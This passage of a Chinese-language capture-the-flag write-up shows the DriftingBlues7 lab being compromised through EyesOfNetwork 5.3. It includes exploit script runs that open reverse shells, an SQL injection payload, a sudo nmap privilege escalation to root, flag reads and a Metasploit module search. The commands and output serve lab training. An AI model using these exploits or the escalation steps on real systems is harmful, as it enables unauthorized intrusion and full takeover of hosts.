USE IF YOU DONT HAVE PERSMISSION !\n\n         EyesOfNetwork 5.3-10\n\n             RedTeam Tool\n\n       Input verification desertion\n\n       RCE via Arbitrary FileUpload\n\nEyesOfNetwork IP :\n172.20.10.4\nHackerIP (used to start the listener) :\n172.20.10.8\nHacker PORT (used to start the listener):\n1234\nUsername (default = admin) :\nadmin\npassword :\nisitreal31__\ngetting sessionID ... \nsessionID acquired : \n\n When the Reverse-Shell is etablished, you can PrivEsc with : \necho &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; \/tmp\/nmap.script\nsudo nmap --script=\/tmp\/nmap.script\n ... I Know ...  \n.\/listen.sh: 1: gnome-terminal: not found\nSending PostRequest ...\n.\/req.sh: 2: Syntax error: Unterminated quoted string\nGet request on the PHP payload ...\nclearing cache<\/code><\/pre>\n<p>\u989d\u8fd9\u4e2a\u4e0d\u884c\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 48025.txt http:\/\/172.20.10.4 -ip 172.20.10.8 -port 1234\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE (API v2.4.2)                                          |\n| 02\/2020 - Cl\u00e9ment Billac Twitter: @h4knet                                  |\n+-----------------------------------------------------------------------------+\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 174, in _new_conn\n    conn = connection.create_connection(\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/connection.py&quot;, line 96, in create_connection\n    raise err\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/connection.py&quot;, line 86, in create_connection\n    sock.connect(sa)\nOSError: [Errno 113] No route to host\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 716, in urlopen\n    httplib_response = self._make_request(\n                       ^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 417, in _make_request\n    conn.request(method, url, **httplib_request_kw)\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 244, in request\n    super(HTTPConnection, self).request(method, url, body=body, headers=headers)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1298, in request\n    self._send_request(method, url, body, headers, encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1344, in _send_request\n    self.endheaders(body, encode_chunked=encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1293, in endheaders\n    self._send_output(message_body, encode_chunked=encode_chunked)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 1052, in _send_output\n    self.send(msg)\n  File &quot;\/usr\/lib\/python3.11\/http\/client.py&quot;, line 990, in send\n    self.connect()\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 205, in connect\n    conn = self._new_conn()\n           ^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connection.py&quot;, line 186, in _new_conn\n    raise NewConnectionError(\nurllib3.exceptions.NewConnectionError: &lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 113] No route to host\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/adapters.py&quot;, line 486, in send\n    resp = conn.urlopen(\n           ^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/connectionpool.py&quot;, line 800, in urlopen\n    retries = retries.increment(\n              ^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/urllib3\/util\/retry.py&quot;, line 592, in increment\n    raise MaxRetryError(_pool, url, error or ResponseError(cause))\nurllib3.exceptions.MaxRetryError: HTTPConnectionPool(host=&#039;172.20.10.4&#039;, port=80): Max retries exceeded with url: \/ (Caused by NewConnectionError(&#039;&lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 113] No route to host&#039;))\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File &quot;\/home\/kali\/temp\/driftingblues7\/48025.txt&quot;, line 89, in &lt;module&gt;\n    r = requests.get(baseurl, verify=False, headers={&#039;user-agent&#039;:useragent})\n        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/api.py&quot;, line 73, in get\n    return request(&quot;get&quot;, url, params=params, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/api.py&quot;, line 59, in request\n    return session.request(method=method, url=url, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/sessions.py&quot;, line 589, in request\n    resp = self.send(prep, **send_kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/sessions.py&quot;, line 703, in send\n    r = adapter.send(request, **kwargs)\n        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File &quot;\/usr\/lib\/python3\/dist-packages\/requests\/adapters.py&quot;, line 519, in send\n    raise ConnectionError(e, request=request)\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host=&#039;172.20.10.4&#039;, port=80): Max retries exceeded with url: \/ (Caused by NewConnectionError(&#039;&lt;urllib3.connection.HTTPConnection object at 0x7f3a33cd8350&gt;: Failed to establish a new connection: [Errno 113] No route to host&#039;))<\/code><\/pre>\n<p>\u8fd9\u4e2a\u4e5f\u4e0d\u884c\uff0c\u518d\u6362\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810227.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810227.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412172248055\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810228.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810228.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173034823\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810229.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810229.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173044617\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7136\u540e\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810230.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810230.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173105370\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6309\u7167payload\u8bf4\u7684\u63d0\u6743\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ echo &#039;os.execute(&quot;\/bin\/sh&quot;)&#039; &gt; \/tmp\/nmap.script\n(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ sudo nmap --script=\/tmp\/nmap.script\n\nStarting Nmap 6.40 ( http:\/\/nmap.org ) at 2024-04-12 05:31 EDT\nNSE: Warning: Loading &#039;\/tmp\/nmap.script&#039; -- the recommended file extension is &#039;.nse&#039;.\nsh-4.2# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nsh-4.2# find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/libexec\/dbus-1\/dbus-daemon-launch-helper\n\/usr\/bin\/newgrp\n\/usr\/bin\/chage\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n\/usr\/bin\/pkexec\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/crontab\n\/usr\/bin\/passwd\n\/usr\/bin\/fusermount\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/sbin\/unix_chkpwd\n\/usr\/sbin\/usernetctl\n\/usr\/sbin\/pam_timestamp_check\nsh-4.2# sudo -l\nMatching Defaults entries for root on driftingblues:\n    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=&quot;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR\n    LS_COLORS&quot;, env_keep+=&quot;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&quot;, env_keep+=&quot;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&quot;,\n    env_keep+=&quot;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&quot;, env_keep+=&quot;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&quot;,\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\n\nUser root may run the following commands on driftingblues:\n    (ALL) ALL\nsh-4.2# cd root\nsh: cd: root: No such file or directory\nsh-4.2# cd \/root\nsh-4.2# ls -la\ntotal 80\ndr-xr-x---.  4 root root  4096 Apr  3  2021 .\ndr-xr-xr-x. 19 root root  4096 Apr  3  2021 ..\n-rw-------.  1 root root   774 Apr  3  2021 .bash_history\n-rw-r--r--.  1 root root    18 Dec 28  2013 .bash_logout\n-rw-r--r--.  1 root root   176 Dec 28  2013 .bash_profile\n-rw-r--r--.  1 root root   176 Dec 28  2013 .bashrc\n-rw-r--r--.  1 root root   100 Dec 28  2013 .cshrc\ndrwxr-----.  3 root root  4096 Apr  3  2021 .pki\n-rw-r--r--.  1 root root   129 Dec 28  2013 .tcshrc\n-rw-------.  1 root root  1401 Apr  3  2021 anaconda-ks.cfg\n-rwxr-xr-x.  1 root root   248 Apr  3  2021 eon\n-rw-r--r--   1 root root 17477 Apr  7  2021 index.htm\ndrwxr-xr-x.  2 root root  4096 Apr  3  2021 index_files\n-rw-r--r--   1 root root    32 Apr  7  2021 root.txt\n-rwxr-xr-x.  1 root root    52 Apr  3  2021 upit.sh\n-rw-r--r--   1 root root    32 Apr  7  2021 user.txt\nsh-4.2# cat root.txt \nBD221F968ACB7E069FC7DDE713995C77sh-4.2# cat user.txt \nAED508ABE3D1D1303E1C1BC5F1C1BA2Bsh-4.2# cat upit.sh \n#!\/bin\/bash\n\ncd \/root\npython -m SimpleHTTPServer 66\nsh-4.2# exit\nexit\nNSE: failed to initialize the script engine:\n\/usr\/bin\/..\/share\/nmap\/nse_main.lua:554: \/tmp\/nmap.script is missing required field: &#039;action&#039;\nstack traceback:\n        [C]: in function &#039;error&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:554: in function &#039;new&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:783: in function &#039;get_chosen_scripts&#039;\n        \/usr\/bin\/..\/share\/nmap\/nse_main.lua:1271: in main chunk\n        [C]: in ?\n\nQUITTING!\n(remote) apache@driftingblues.localdomain:\/srv\/eyesofnetwork\/lilac\/autodiscovery$ sudo -l\nMatching Defaults entries for apache on driftingblues:\n    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=&quot;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR\n    LS_COLORS&quot;, env_keep+=&quot;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&quot;, env_keep+=&quot;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&quot;,\n    env_keep+=&quot;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&quot;, env_keep+=&quot;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&quot;,\n    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\n\nUser apache may run the following commands on driftingblues:\n    (root) NOPASSWD: \/bin\/systemctl * snmptt, \/bin\/systemctl * snmptrapd, \/bin\/systemctl * snmpd, \/bin\/systemctl * nagios, \/bin\/systemctl * gedd,\n        \/usr\/bin\/nmap<\/code><\/pre>\n<p>\u539f\u6765\u81ea\u5e26\u4e86suid\u7684nmap\uff0c\u770b\u4e00\u4e0b\u6f0f\u6d1e\u65f6\u95f4\u4ee5\u53ca\u9776\u673a\u65f6\u95f4\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810231.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810231.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173424609\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810232.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810232.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173453912\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u574f\u4e86\uff0c\u8fd9\u662f\u4e4b\u540e\u624d\u53d1\u73b0\u7684\u6f0f\u6d1e\u3002\u3002\u3002\u3002\u5c1d\u8bd5google\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810233.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810233.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173751336\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810234.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810234.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412173829620\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u65f6\u95f4\u5012\u662f\u6ee1\u8db3\u8981\u6c42\uff0c\u4e0b\u8f7d\u770b\u4e00\u4e0b\u884c\u4e0d\u884c\uff0c\u548c\u4e0a\u9762\u53d1\u751f\u4e86\u4e00\u6837\u7684\u62a5\u9519\uff0c\u770b\u770b\u53e6\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810235.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404121810235.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240412174429903\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e5f\u7b26\u5408\u8981\u6c42\uff0c\u8bd5\u8bd5\uff0c\u4e00\u76f4\u62a5\u9519\u554a\uff0c\u6211\u624d\u53d1\u73b0\u9776\u573aip\u88ab\u6211\u586b\u9519\u4e86\u3002\u3002\u3002\u3002\u91cd\u65b0\u8bd5\u4e00\u4e0b\u6240\u6709\u7684\u3002\u3002<\/p>\n<p>\u597d\u5728\u4e4b\u524d\u4e0d\u884c\u7684\u73b0\u5728\u4f9d\u7136\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce.py -h                                                                               \nusage: \n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE                                                       |\n| 03\/2020 - v1.1 - Cl\u00e9ment Billac Twitter: @h4knet                            |\n|                                                                             |\n| Examples:                                                                   |\n| eonrce.py -h                                                                |\n| eonrce.py http(s):\/\/EyesOfNetwork-URL                                       |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -port 3128                |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -user pentest2020         |\n+-----------------------------------------------------------------------------+\npositional arguments:\n  URL                 URL of the EyesOfNetwork server\n\noptions:\n  -h, --help          show this help message and exit\n  -ip IP              Local IP to receive reverse shell\n  -port Port          Local port to listen\n  -user Username      Name of the new user to create\n  -password Password  Password of the new user\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce.py http:\/\/172.20.10.6 -ip 172.20.10.8 -port 1234 -user admin -password isitreal31__\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.3 RCE                                                       |\n| 03\/2020 - v1.1 - Cl\u00e9ment Billac - Twitter: @h4knet                          |\n+-----------------------------------------------------------------------------+\n[*] Reverse shell: 172.20.10.8:1234\n[*] User to create: admin:isitreal31__\n[*] EyesOfNetwork login page found\n[*] EyesOfNetwork API page found. API version: 2.4.2\n[x] The host seems patched or unexploitable\n[!] Did you specified http instead of https in the URL ?\n[!] You can check manually the SQLi with the following payload: \/eonapi\/getApiKey?username=&#039; union select sleep(3),0,0,0,0,0,0,0 or &#039;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce2.py -h                                                                             \nusage: \n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.1 to 5.3 RCE exploit                                        |\n| 03\/2020 - v1.0 - Cl\u00e9ment Billac - Twitter: @h4knet                          |\n|                                                                             |\n| Examples:                                                                   |\n| eonrce.py -h                                                                |\n| eonrce.py http(s):\/\/EyesOfNetwork-URL                                       |\n| eonrce.py https:\/\/eon.thinc.local -ip 10.11.0.182 -port 3128                |\n+-----------------------------------------------------------------------------+\npositional arguments:\n  URL           URL of the EyesOfNetwork server\n\noptions:\n  -h, --help    show this help message and exit\n  -ip IP        Local IP to receive reverse shell\n  -port Port    Local port to listen\n  -sleep Sleep  SQL Sleep value\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ python3 eonrce2.py http:\/\/172.20.10.6 -ip 172.20.10.8 -port 1234\n+-----------------------------------------------------------------------------+\n| EyesOfNetwork 5.1 to 5.3 RCE exploit                                        |\n| 03\/2020 - v1.0 - Cl\u00e9ment Billac - Twitter: @h4knet                        |\n+-----------------------------------------------------------------------------+\n\n[*] EyesOfNetwork login page found\n[+] Application seems vulnerable. Time: 1.006418\n[*] The admin user has at least one session opened\n[*] Found the admin session_id size: 29\n[+] Obtained admin session ID: 358748692\n[x] Error while creating the discovery job<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u5565\u60c5\u51b5\uff0c\u6709\u7684\u5e08\u5085\u7528\u8fd9\u4e2a\u811a\u672c\u51fa\u6765\u7684\uff0c\u4f46\u662f\u6211\u6ca1\u6709\u6210\u529f\uff0c\u5c1d\u8bd5\u90a3\u4e2amsf\u811a\u672c\uff0c\u90a3\u4e2a\u65f6\u95f4\u4e5f\u5bf9\u7684\u4e0a\u7684\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ msfconsole\nMetasploit tip: Use the resource command to run commands from a file\n\n               .;lxO0KXXXK0Oxl:.\n           ,o0WMMMMMMMMMMMMMMMMMMKd,\n        &#039;xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,\n      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:\n    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,\n   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo\n  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk\n oMMMMMMMMMMx.                    dMMMMMMMMMMx\n.WMMMMMMMMM:                       :MMMMMMMMMM,\nxMMMMMMMMMo                         lMMMMMMMMMO\nNMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;\nMMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:\nNMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:\nxMMMMMMMMMd                        ,0MMMMMMMMMMK;\n.WMMMMMMMMMc                         &#039;OMMMMMM0,\n lMMMMMMMMMMk.                         .kMMO&#039;\n  dMMMMMMMMMMWd&#039;                         ..\n   cWMMMMMMMMMMMNxc&#039;.                ##########\n    .0MMMMMMMMMMMMMMMMWc            #+#    #+#\n      ;0MMMMMMMMMMMMMMMo.          +:+\n        .dNMMMMMMMMMMMMo          +#++:++#+\n           &#039;oOWMMMMMMMMo                +:+\n               .,cdkO0K;        :+:    :+:                                \n                                :::::::+:\n                      Metasploit\n\n       =[ metasploit v6.3.55-dev                          ]\n+ -- --=[ 2397 exploits - 1235 auxiliary - 422 post       ]\n+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]\n+ -- --=[ 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n\nmsf6 &gt; search eyesofnetwork\n\nMatching Modules\n================\n\n   #  Name                                                Disclosure Date  Rank       Check  Description\n   -  ----                                                ---------------  ----       -----  -----------\n   0  exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce  2020-02-06       excellent  Yes    EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution\n\nInteract with a module by name or index. For example info 0, use 0 or use exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce\n\nmsf6 &gt; use 0\n[*] Using configured payload linux\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; show options;\n[-] Invalid parameter &quot;options;&quot;, use &quot;show -h&quot; for more information\nmsf6 exploit(linux\/http\/eyesofnetwork_autodiscovery_rce) &gt; show options\n\nModule options (exploit\/linux\/http\/eyesofnetwork_autodiscovery_rce):\n\n   Name         Current Setting  Required  Description\n   ----         ---------------  --------  -----------\n   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS                        yes       The target host(s), see 